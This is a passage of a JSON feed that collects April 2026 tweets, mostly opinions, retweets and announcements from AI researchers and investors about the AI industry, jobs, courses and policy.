"RT by @erikbryn: Excited to speak at my friend @erikbryn’s ECON 295/CS 323\nclass at @Stanford today. Questions?", + "url": "https://nitter.net/saranormous/status/2046637828025835983#m", + "published_at": "2026-04-21T17:10:57+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: The future of computer vision is agentic.\n\n1/ We built Nomadic around a gap we kept seeing in video understanding: VLMs generate chain-of-thought that's fluent and often correct in structure, but weakly grounded in what's actually in the video.\n\nThis limitation shows up in cases like \"rolling stops\". Is the stop sign actually associated with the vehicle’s lane? Does the ego vehicle ever come to a full stop, or only decelerate?", + "url": "https://nitter.net/nomadicai/status/2046635685206208533#m", + "published_at": "2026-04-21T17:02:26+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: Following positive feedback from other venues, like STOC and ICML, NeurIPS is pleased to announce a new initiative in partnership with Google: for NeurIPS 2026, authors will have access to Google's Paper Assistant Tool (PAT) to help improve their submissions. \n\nThis program offers authors the opportunity to receive free, automated, and actionable feedback on their manuscripts before the final deadline, private to the authors. It is a completely optional service that is kept strictly private to the authors and will not be used in the review process.\n\nRead more in our blog post: https://blog.neurips.cc/2026/04/21/neurips-supports-authors-with-googles-paper-assistant-tool-pat/", + "url": "https://nitter.net/NeurIPSConf/status/2046632664493384060#m", + "published_at": "2026-04-21T16:50:26+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: This is insane…\n\nThe Virginia redistricting amendment on the ballot today is framed as a vote to \"restore fairness in the upcoming elections.\"\n\nIn reality, it turns a state that Kamala barely won by 5 pts from 6D-5R to 10D-1R.", + "url": "https://nitter.net/Geiger_Capital/status/2046632586735243420#m", + "published_at": "2026-04-21T16:50:07+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "In a world of agents, how do software providers prevent themselves from becoming valueless databases?\n\n\"The value proposition has to be:\n\n1. How good are your APIs?\n\n2. How well designed are they\n\n3. Are they ready for agents?\n\n4. Can you monetize that in some way?\n\nWe are treating software too much like one monolithic industry.\n\nThere's a lot of categories of software where agents using the tools is a massive boon for the technology as opposed to a dilemma.\" @levie\n\nLove to hear your thoughts on this @Benioff @dharmesh @mcannonbrookes @rauchg @mcuban", + "url": "https://nitter.net/HarryStebbings/status/2046614183513604299#m", + "published_at": "2026-04-21T15:37:00+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "🔥", + "url": "https://nitter.net/eladgil/status/2046375878368940239#m", + "published_at": "2026-04-20T23:50:03+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "What Role Does Not Exist Today But Will Be So Common in Five Years Time:\n\n\"500K-1M jobs will be created for agent operators.\n\nThis person will be somewhat technical. They will be deep in the AI world.\n\nThey're gonna have to understand MCPs and CLIs and they are going to have to know how to write skills.\n\nIt's going be this group of people that will know how to go into your marketing team or your legal team, or your operations team, or your life sciences research team and this is the person that is basically going to enable that function to get leverage from agents.\" @levie\n\nWhere is this right? Where is this wrong? @jasonlk @gregisenberg @amasad @AnjneyMidha", + "url": "https://nitter.net/HarryStebbings/status/2046353968973160675#m", + "published_at": "2026-04-20T22:23:00+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: Read how Google built custom silicon and infrastructure - and how it's benefiting customers today - in the latest from @Bloomberg. We'll share more updates this week at #GoogleCloudNext. \nhttps://www.bloomberg.com/news/features/2026-04-20/google-eyes-new-chips-to-speed-up-ai-results-challenging-nvidia?srnd=undefined", + "url": "https://nitter.net/ThomasOrTK/status/2046344875994739028#m", + "published_at": "2026-04-20T21:46:52+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "TikTok follower growth and virality means nothing. \n\nViews and followers are essentially worth nothing. \n\nBut it is the best testing ground on the planet to try material before taking it to Instagram and YouTube.", + "url": "https://nitter.net/HarryStebbings/status/2046339832922689673#m", + "published_at": "2026-04-20T21:26:49+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: Link to fuller post:\nhttps://substack.com/home/post/p-194229552?source=queue", + "url": "https://nitter.net/eladgil/status/2046300649483374704#m", + "published_at": "2026-04-20T18:51:07+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Here is the sbstack version\n\n\"Random thoughts while gazing at the misty AI Frontier\"\n\nhttps://blog.eladgil.com/p/random-thoughts-while-gazing-at-the", + "url": "https://nitter.net/eladgil/status/2046284381439103043#m", + "published_at": "2026-04-20T17:46:29+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 13/12 Anti-AI regulation & violence will both increase\n\nIt is important for leaders in tech and AI to point out the benefits of AI to society and the world more aggressively", + "url": "https://nitter.net/eladgil/status/2046284194943500453#m", + "published_at": "2026-04-20T17:45:44+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 12/12 Most AI companies should consider exiting in the next 12-18 months", + "url": "https://nitter.net/eladgil/status/2046284191885922498#m", + "published_at": "2026-04-20T17:45:44+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 11/12 AI is about selling work, not software. Units of labor as the product\n\nThis is a big shift in TAM, agents, how to build product in the AI era. Many AI markets are 10-100X the size of their seat based software counterparts", + "url": "https://nitter.net/eladgil/status/2046284190132609299#m", + "published_at": "2026-04-20T17:45:43+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 10/12 Harness creating more and more stickiness to models\n\nIf you look at the use of AI coding tools, the harness (and broader product surface area eg UX, workflow, etc) seems to be increasingly sticky in the short term.\n\nIt is not just the model you use, but the environment, prompting, etc you build around it that helps impact your choice. Brand also matters more then many people think. At some point, either one coding model breaks very far ahead, or they stay neck in neck. How important is the harness/workflow long term for defensibility for coding or enterprise applications?", + "url": "https://nitter.net/eladgil/status/2046284188622737554#m", + "published_at": "2026-04-20T17:45:43+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 9/12 Artisanal engineers will be be increasingly unhappy inside companies.\n\nDeep artisanal “my code is my craft” and “I love creating bespoke things” engineers decreasingly happy in world of AI. Systems thinkers and product thinkers engineers happiest. Many people are a mix of both", + "url": "https://nitter.net/eladgil/status/2046284184877187540#m", + "published_at": "2026-04-20T17:45:42+00:00" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: Dwarkesh is not an AGI party bro. He's been pretty diverse in how he seeks alpha from across a wide variety of industries. I enjoy the hell out of a lot of his podcasts.\nThis podcast though, his questions and narrative are very AGI Party takes, because I think they're very low-rank. That's my opinion.", + "url": "https://nitter.net/soumithchintala/status/2046282944139215141#m", + "published_at": "2026-04-20T17:40:46+00:00" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "The Jensen + @dwarkesh_sp podcast was fantastic. \nJensen is someone who understood how ecosystems work and someone who understands real-world trade, policy and controls work. And in some deeper sense how AI will actually diffuse into the world.\nIn this podcast, Dwarkesh came off as someone who picked up talking points from an AGI party in the SF Mission District.\nAnd the contrast was so evident.\nAs someone who understood ecosystems relatively deepy, maybe I understood Jensen's take more than others did (idk).\n\nMythos, that Dwarkesh kept bringing up, is not a single absolute turning point in the AI development landscape. Take a state-of-the-art Chinese open-source model, and give it three orders of magnitude more test-time compute + post-training algorithmic advances that haven't been published yet. That's the baseline. It was evident that in whatever bubble Dwarkesh is in, that is seen as a naive or illogical baseline.\n\nWhen AI has such a complex development cycle, it's evident that America needs many levers of policy intervention across multiple layers in a dominant ecosystem that ideally the Western world controls.\n\nThe entire premise that a particular model with AI development will have a critical phase change is neither correct nor does evidence point to it. OpenAI made this point with GPT-4, Anthropic made this point with Mythos, but neither stood / will stand the test of time.\n\nI think Jensen's repeated emphasis within the podcast to try to make this point mostly didn't get Dwarkesh's attention. And Dwarkesh (in this podcast) represents an entire cult of AI researchers and decision-makers that are going to influence policy.\n\nThe thing with policy interventions is that if you do too much too early, you shoot yourself in the foot. There's a good reason American foreign policy and general sanctions of all kinds are measured and continuous.\n\nDespite Jensen's attempt at educating the \"Anthro\" audience how ecosystems work, I'm also not super hopeful a lot of people who've taken the extreme position will change their thought after listening to this podcast. I do think there's a certain religiousness that has permeated some of that community that would make it hard to understand ecosystems at a deeper level.", + "url": "https://nitter.net/soumithchintala/status/2046265830908870983#m", + "published_at": "2026-04-20T16:32:46+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "Here's a crisp summary by @EconChrisClarke of some of the key findings of our Canaries in the Coal Mine, the counter arguments, the counter-counter arguments and the complementary research by others. @BharatKChandar @RuyuChen", + "url": "https://nitter.net/erikbryn/status/2046244291945927102#m", + "published_at": "2026-04-20T15:07:11+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: One union spends more on political contributions in Washington than the entire tech industry.", + "url": "https://nitter.net/pmddomingos/status/2046063371951464753#m", + "published_at": "2026-04-20T03:08:16+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: This is the best take I have heard around the existing AI landscape today\n\nFantastic explanation around the constraints at OpenAI and Anthropic, focus on enterprise business models, and the doomerism narrative in AI\n\nFrom former AI czar David Sacks\n\n\"Even though Anthropic's revenue has followed this exponential graph very predictably, it cannot do that ever. \n\nThe reason is that as you hit new levels of scale, you encounter new problems. You are simply going to run out of compute, electricity, data centers, and infrastructure.\n\nThere are limits to the physical world you are going to hit. And there is already evidence that Anthropic is hitting some of those limits.\"", + "url": "https://nitter.net/BoringBiz_/status/2045922884741140941#m", + "published_at": "2026-04-19T17:50:01+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "R to @erikbryn: Here's the course:\n\nhttps://www.masterclass.com/classes/revolutionize-your-workflows-with-ai", + "url": "https://nitter.net/erikbryn/status/2045586582879764872#m", + "published_at": "2026-04-18T19:33:41+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "AI should have been named IA.\n\nMillions more people would have embraced it to boost their everyday performance.\n\nIt's something I discuss in my new @MasterClass", + "url": "https://nitter.net/erikbryn/status/2045586493494989066#m", + "published_at": "2026-04-18T19:33:19+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: CATER DIAMOND YOU ARE NOT SAFE AROUND ME", + "url": "https://nitter.net/jankacest/status/2045310986412781730#m", + "published_at": "2026-04-18T01:18:33+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: The Universal High Income Power Map\n\nft. @elonmusk, @AndrewYang, @erikbryn", + "url": "https://nitter.net/ADINresearch/status/2045223340420272212#m", + "published_at": "2026-04-17T19:30:17+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: 🤤", + "url": "https://nitter.net/jankacest/status/2045223202381508777#m", + "published_at": "2026-04-17T19:29:44+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "You cannot believe how much intrinsic knowledge GPT-5.4 has about building GPU compute kernels. I honestly think this will materially impact NVIDIA's lead in software.", + "url": "https://nitter.net/liuliu/status/2045210034813186142#m", + "published_at": "2026-04-17T18:37:25+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: AI assistants don’t just answer questions anymore; they jump in with suggestions. Does this generally improve worker's quality of output or hurt it? How do these effects vary by experience level? Join @mattbeane next week at @DigEconLab to learn more: https://digitaleconomy.stanford.edu/event/matt-beane-del-seminar-series-2/", + "url": "https://nitter.net/StanfordHAI/status/2045201392739205391#m", + "published_at": "2026-04-17T18:03:04+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "AI can power small teams to boost output, write @saraheneedleman in @BusinessInsider.\n\nhttps://africa.businessinsider.com/careers/snaps-layoffs-highlight-growing-work-trend-ai-powered-tiny-teams/xw8stkt\n\nHere's my quote:\n\n\"The winners won't simply be the leanest organizations,\" [Brynjolfsson] said. \"They'll be the ones that best redesign work so humans and AI complement each other.\"", + "url": "https://nitter.net/erikbryn/status/2044943654486462558#m", + "published_at": "2026-04-17T00:58:55+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "M4 is faster (since a few days ago): https://engineering.drawthings.ai/p/making-apple-neural-engine-work-in", + "url": "https://nitter.net/liuliu/status/2044865239532163122#m", + "published_at": "2026-04-16T19:47:19+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "R to @liuliu: Image", + "url": "https://nitter.net/liuliu/status/2044827486220111890#m", + "published_at": "2026-04-16T17:17:18+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "Hold my beer:", + "url": "https://nitter.net/liuliu/status/2044827484823412831#m", + "published_at": "2026-04-16T17:17:18+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "R to @erikbryn: Here's the course:\n\nhttps://www.masterclass.com/classes/revolutionize-your-workflows-with-ai", + "url": "https://nitter.net/erikbryn/status/2044816749720432652#m", + "published_at": "2026-04-16T16:34:38+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "Most people are only getting a fraction of the value they could be getting from AI tools. It's a huge \"capabilities overhang\".\n\nAlong with the amazing Cat Goetze and Parth Patil, I've created a @MasterClass that quickly shows you how to operate at the scale of a small team with a set of easy-to-use AI tools.\n\nCheck out the link below.", + "url": "https://nitter.net/erikbryn/status/2044816389521969353#m", + "published_at": "2026-04-16T16:33:12+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: What a pleasant surprise to see the former Prime Minister of #UK (@RishiSunak) post about the @Stanford paper on Enterprise #AI I co-authored. 💡\n\n@erikbryn @elisacmpereira1 @DigEconLab #FutureofWork @StanfordHAI", + "url": "https://nitter.net/AGraylin/status/2044570504577855699#m", + "published_at": "2026-04-16T00:16:09+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Very excited to share that our project was selected as a @LaudeInstitute Moonshots seed grant winner on workforce upskilling @tatsu_hashimoto @erikbryn \n\nThis is something I think about a lot these days. With so much uncertainty about AI and jobs today, I'm deeply motivated by this question of how can we use LLMs not to replace people, but to empower them...", + "url": "https://nitter.net/Diyi_Yang/status/2044513911484125496#m", + "published_at": "2026-04-15T20:31:16+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "It was a delight to serve on the selection committee with an awesome group of committee members. We had lots of great submissions to evaluate and excellent discussions during our selection process.\n\nYou can see the selected proposals below and learn more at http://laude.org/moonshots", + "url": "https://nitter.net/JeffDean/status/2044509365164773818#m", + "published_at": "2026-04-15T20:13:12+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: “Collaborative Intelligence for the Future of Work” from Lab Director @erikbryn, @tatsu_hashimoto and @Diyi_Yang has an ambitious plan for policymakers, workers and institutions to get ahead of AI’s disruption of labor.\n\nhttps://www.laude.org/moonshots/one/collaborative-intelligence-future-of-work", + "url": "https://nitter.net/DigEconLab/status/2044486951290716635#m", + "published_at": "2026-04-15T18:44:08+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Workforce Reskilling track: Research that helps people adapt to labor market shifts through retraining, upskilling, and lifelong learning.\n\n🤖Collaborative Intelligence for the Future of Work, @Stanford\nWhat does it actually mean to augment workers rather than replace them? This team is running the trials to find out.\n@erikbryn @tatsu_hashimoto @Diyi_Yang \n\n🤲ARISTOS: Reskilling for a Physical Workforce, @CarnegieMellon\nDexterous physical work is one of the last things AI can't simply automate. This team is building an AI craft master that teaches it on demand.\n@RamananDeva @ChangliuL Raj Reddy Katia Sycara @junyanz89", + "url": "https://nitter.net/LaudeInstitute/status/2044468446696731011#m", + "published_at": "2026-04-15T17:30:36+00:00" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "title": "New course: Spec-Driven Development with Coding Agents, built in partnership with @jetbrains, and taught by @paulweveritt.\n\nVibe coding is fast, but often produces code that doesn't match what you asked for. This short course teaches you spec-driven development: write a detailed spec defining what to build, and work with your coding agent to implement it. Many of the best developers already build this way.\n\nA spec lets you control large code changes with a few words, preserve context across agent sessions, and stay in control as your project grows in complexity.\n\nSkills you'll gain:\n- Write a detailed specification to define your mission, tech stack, and roadmap, giving your agent the context it needs from the start\n- Plan, implement, and validate features in iterative loops using a spec as your agent's guide\n- Apply the same repeatable workflow to both new and legacy codebases\n- Package your workflow into a portable agent skill that works across agents and IDEs\n\nJoin and write specs that keep your coding agent on track!\nhttps://www.deeplearning.ai/short-courses/spec-driven-development", + "url": "https://nitter.net/AndrewYNg/status/2044449830605582629#m", + "published_at": "2026-04-15T16:16:38+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: In case it's not clear, you can click on the picture in the first image to learn more about Ricardo and the award: Twitter swallowed my actual link text to https://awards.acm.org/about/2025-barroso to turn it into the picture, I guess.", + "url": "https://nitter.net/JeffDean/status/2044449033490760085#m", + "published_at": "2026-04-15T16:13:28+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "Delighted to see that Ricardo Baeza-Yates (@PolarBearby) is this year's winner of the @TheOfficialACM Luiz Barroso Award (an award named in honor of my longtime Google colleague).\n\nRicardo is widely regarded as one of the world’s foremost researchers in information retrieval, and many of you may have read is excellent textbook Modern Information Retrieval (co-authored with Berthier Ribeiro-Neto). He has also played a pivotal role in strengthening the Latin American computing community.\n\nRicardo's accomplishments and selection would make Luiz proud!\n\nhttps://awards.acm.org/about/2025-barroso", + "url": "https://nitter.net/JeffDean/status/2044448743811129716#m", + "published_at": "2026-04-15T16:12:19+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: Introducing Gemini 3.1 Flash TTS 🗣️, our latest text to speech model with scene direction, speaker level specificity, audio tags, more natural + expressive voices, and support for 70 different languages.\n\nAvailable via our new audio playground in AI Studio and in the Gemini API!", + "url": "https://nitter.net/OfficialLoganK/status/2044447596010435054#m", + "published_at": "2026-04-15T16:07:45+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Truth, love, and beauty are all pursued for their own sake, even if they make us worse off.", + "url": "https://nitter.net/naval/status/2044234462972784792#m", + "published_at": "2026-04-15T02:00:50+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "Apparently, this continues for M5 users too.", + "url": "https://nitter.net/liuliu/status/2044111782839759304#m", + "published_at": "2026-04-14T17:53:21+00:00" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "title": "I'm excited about voice as a UI layer for existing visual applications — where speech and screen update together. This goes well beyond voice-only use cases like call center automation.\n\nThe barrier has been a hard technical tradeoff: low-latency voice models lack reliability, while agentic pipelines (speech-to-text → LLM → text-to-speech) are intelligent but too slow for conversation. Ashwyn Sharma and team at Vocal Bridge (an AI Fund portfolio company) address this with a dual-agent architecture: a foreground agent for real-time conversation, a background agent for reasoning, guardrails, and tool calls.\n\nI used Vocal Bridge to add voice to a math-quiz app I'd built for my daughter; this took less than an hour with Claude Code. She speaks her answers, the app responds verbally and updates the questions and animations on screen.\n\nOnly a tiny fraction of developers have ever built a voice app. If you'd like to try building one, check out Vocal Bridge for free: https://vocalbridgeai.com", + "url": "https://nitter.net/AndrewYNg/status/2044088884989177991#m", + "published_at": "2026-04-14T16:22:22+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: We’re rolling out an upgrade designed to help robots reason about the physical world. 🤖\n\nGemini Robotics-ER 1.6 has significantly better visual and spatial understanding in order to plan and complete more useful tasks. Here’s why this is important 🧵", + "url": "https://nitter.net/GoogleDeepMind/status/2044069878781390929#m", + "published_at": "2026-04-14T15:06:50+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "See data on the net flow of AI authors and inventors and thousands of other insights in the #AIIndex2026, released today.", + "url": "https://nitter.net/erikbryn/status/2043798774699683995#m", + "published_at": "2026-04-13T21:09:34+00:00" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "Just like us at @thinkymachines, @luke_drago_ @LRudL_ care a lot about amplifying humans, not replacing them.\nThey're joining us to build towards that future!", + "url": "https://nitter.net/soumithchintala/status/2043752413085966574#m", + "published_at": "2026-04-13T18:05:21+00:00" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "title": "As AI agents accelerate coding, what is the future of software engineering? Some trends are clear, such as the Product Management Bottleneck, referring to the idea that we are more constrained by deciding what to build rather than the actual building. But many implications, like AI’s impact on the job market, how software teams will be organized, and more, are still being sorted out.\n\nThe theme of our AI Developer Conference on April 28-29 in San Francisco is The Future of Software Engineering. I look forward to speaking about this topic there, hearing from other speakers on this theme, and chatting with attendees about it. We’re shaping the future, and I hope you will join me there!\n\nIt is currently trendy in some technology and policy circles to forecast massive job losses due to AI. Even if they have not yet materialized, these losses certainly must be just over the horizon! I have a contrarian view that the AI jobpocalypse — the notion that AI will lead to massive unemployment, perhaps even rioting in the streets — won’t be nearly as bad as dire forecasts by pundits, especially pundits who are trying to paint a picture of how powerful their AI technology is.\n\nAmong professions, AI is accelerating software engineering most, given the rise of coding agents. According to a new report by Citadel Research, software engineering job postings are rising rapidly. So if software engineering is a harbinger of the impact AI will have on other professions, this expansion of software engineering jobs is encouraging.\n\nYes, fresh college graduates are having a hard time finding jobs. And yes, there have been layoffs that CEOs have attributed to AI, even if a large fraction of this was “AI washing,” where businesses choose to attribute layoffs to AI, even though AI has not changed their internal operations much yet. And yes, there is a subset of job roles, such as call center operator, that are more heavily impacted. Many people are feeling significant job insecurity, and I feel for everyone struggling with employment, whether or not the cause is AI-related. And many other factors, such as over-hiring during the pandemic and high interest rates, have contributed to the slowdown in the labor market, and the notion that AI is leading to unemployment is oversimplified.\n\nIn software engineering, I see a lot of exciting work ahead to adapt our workflows. It is already clear that: (i) As AI makes coding easier, a lot more people will be doing it. (ii) Writing code by hand and even reading (generated) code is not that important, because we can ask an LLM about the code and operate at a higher level than the raw syntax (although how high we can or should go is rapidly changing). (iii) There will be a lot more custom applications, because now it’s economical to write software for smaller and smaller audiences. (iv) Deciding what to build, more than the actual building, is becoming a bottleneck. (v) The cost of paying down technical debt is decreasing (since AI can refactor for you).\n\nAt the same time, there are also a lot of open questions for our profession, such as:\n- In the future, what will be the key skills of a senior software engineer? And for junior levels, what should be the new Computer Science curriculum?\n- If everyone can build features, what skills, strategies, or resources create competitive advantage for individuals and for businesses?\n- What are the new building blocks (libraries, SDKs, etc.) of software? How do we organize coding agents to create software?\n- What should a software team look like? For example, how many engineers, product managers, designers, and so on. What tooling do we need to manage their workflow?\n- How do AI agents change the workflow of machine learning engineers and data scientists? For example, how can we use agents to accelerate exploring data, identifying hypotheses, and testing them?\n\nI’m excited to explore these and other questions about the future of software engineering at AI Dev. I expect this to be an exciting event. Please join us!\n\n[Original text: The Batch newsletter.]\n\nhttps://ai-dev.deeplearning.ai/", + "url": "https://nitter.net/AndrewYNg/status/2043742105852621052#m", + "published_at": "2026-04-13T17:24:23+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Dean Pomerleau was working on self-driving cars decades before Teslas and Waymos hit the streets.\n\n@tommmitchell dives into the surprising early history of autonomous driving in the latest episode of Machine Learning: How Did We Get Here?\n\nWatch here: https://www.youtube.com/watch?v=q-lRgHGiIMQ", + "url": "https://nitter.net/DigEconLab/status/2043730014798225488#m", + "published_at": "2026-04-13T16:36:20+00:00" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: $200/month is enough to buy an H100 GPU for 6 hours every workday", + "url": "https://nitter.net/ekzhang1/status/2043562453452128359#m", + "published_at": "2026-04-13T05:30:31+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: Artemis II astronaut Victor Glover received a hero's welcome from his neighbors! 🇺🇸", + "url": "https://nitter.net/OwenSparks/status/2043477332438958253#m", + "published_at": "2026-04-12T23:52:16+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "Download to double your FLOPs on your M4s.", + "url": "https://nitter.net/liuliu/status/2043041062265196703#m", + "published_at": "2026-04-11T18:58:41+00:00" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "Discretionary traders should think carefully about instrument selection\n\nAs in spot vs spot margin vs perps vs options and combinations therein\n\nThe obvious components are cost, liquidity, and capital efficiency. The non-obvious components are drawdown tolerance, volatility tolerance, and trade management.\n\nFrom personal experience:\n\nPerps are excellent for intraday trading, but for swing trading and larger bets my performance was worse because I would over-manage those positions and be much more sensitive to drawdowns etc.\n\nSpot/spot margin are great for larger bets and higher time frame swing trades. I'd find myself less concerned with the tick-by-tick movements so I could actually hold the trade, but whenever I've tried to LTF trade those instruments, I would get complacent with trade management.\n\nThe tempting default answer is perps for liquidity + to size up, but your bigger position isn't helpful if it means you sabotage yourself by managing it poorly\n\nI'm certain that you can think of trades that were great ideas but poorly executed - instrument selection may be the culprit", + "url": "https://nitter.net/CryptoCred/status/2042967332952101173#m", + "published_at": "2026-04-11T14:05:43+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "This is so awesome! When I was a kid, when the Apollo mission were still relatively fresh in the recent past, I just assumed we would send people & missions to the moon quite regularly. Hard to believe we haven't since 1972! Congrats to everyone at @NASA! 🎉", + "url": "https://nitter.net/JeffDean/status/2042819001815126233#m", + "published_at": "2026-04-11T04:16:18+00:00" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: OpenAI is nothing without its people https://geohot.github.io//blog/jekyll/update/2026/04/11/openai-people.html", + "url": "https://nitter.net/geohotarchive/status/2042804258584580211#m", + "published_at": "2026-04-11T03:17:43+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: Yet another inspiration to women in STEM.\n\nChristina Koch is her name🌑", + "url": "https://nitter.net/Ms_Dhaey/status/2042762001873502676#m", + "published_at": "2026-04-11T00:29:48+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: I spoke out about the Colorado law last year. Given the threat to freedom of speech, all conservatives should be able to support this challenge, even if they have other concerns about AI.", + "url": "https://nitter.net/DavidSacks/status/2042391709129326829#m", + "published_at": "2026-04-09T23:58:23+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Kudos to @xAI for being the first AI company to challenge a Colorado law requiring it to censor truthful answers if they could have a “differential impact” on protected groups. This is Woke AI. It teaches AI models to lie. And it’s a violation of the First Amendment.", + "url": "https://nitter.net/DavidSacks/status/2042390626436792399#m", + "published_at": "2026-04-09T23:54:05+00:00" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: We’ve redesigned our docs with easy access to SDK reference, tutorials, support, and our newly updated cookbook---v0.3.0!\n\nWhether you’re writing your first training loop in Tinker or debugging async RL, we want to make it easier to find what you need.", + "url": "https://nitter.net/tinkerapi/status/2042330088130441337#m", + "published_at": "2026-04-09T19:53:32+00:00" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "title": "New course: Efficient Inference with SGLang: Text and Image Generation, built in partnership with LMSys @lmsysorg and RadixArk @radixark, and taught by Richard Chen @richardczl, a Member of Technical Staff at RadixArk.\n\nRunning LLMs in production is expensive, and much of that cost comes from redundant computation. This short course teaches you to eliminate that waste using SGLang, an open-source inference framework that caches computation already done and reuses it across future requests.\n\nWhen ten users share the same system prompt, SGLang processes it once, not ten times. The speedups compound quickly, especially when there's a lot of shared context across requests.\n\nSkills you'll gain:\n- Implement a KV cache from scratch to eliminate redundant computation within a single request\n- Scale caching across users and requests with RadixAttention, so shared context is only processed once\n- Accelerate image generation with diffusion models using SGLang's caching and multi-GPU 